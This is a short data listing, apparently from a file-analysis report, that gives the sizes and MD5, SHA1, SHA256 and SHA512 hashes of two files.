-
Filesize
5.7MB
MD55bda5e3354916c14aeef5e9c1589ea99
SHA1a9bf3059461f569a290fbbfe0e59d9629f5749ec
SHA2567fa2c88d0732f4f432320d0b8cdc8a024b5efcae99da74dcd06dc91089ffd101
SHA5125a9b55bf1124002e67468f133f47008426f19f1acb7de76eb001fc94ff4e9170142fa8b394bc8cee8d805a8484724135ef0251f029bd1304954b0aa2a2f8a987
-
Filesize
7.8MB
MD52c478377002d8f8c188252f338e10d17
SHA171c3b3154ae57c9e692c32653ab8859c23680b30
SHA256bda32a05036ce8fabd53f41509c114c5bf2c9d8343fb7725b6b21903ca44a89c
SHA512fd183050382e834dadec658d0f9673607049a605c5c7dafe997d74b3921dafca0b677b8cfba9733cfd1d9c80581133281778f6be46f7080c5d743ea2c6f99dde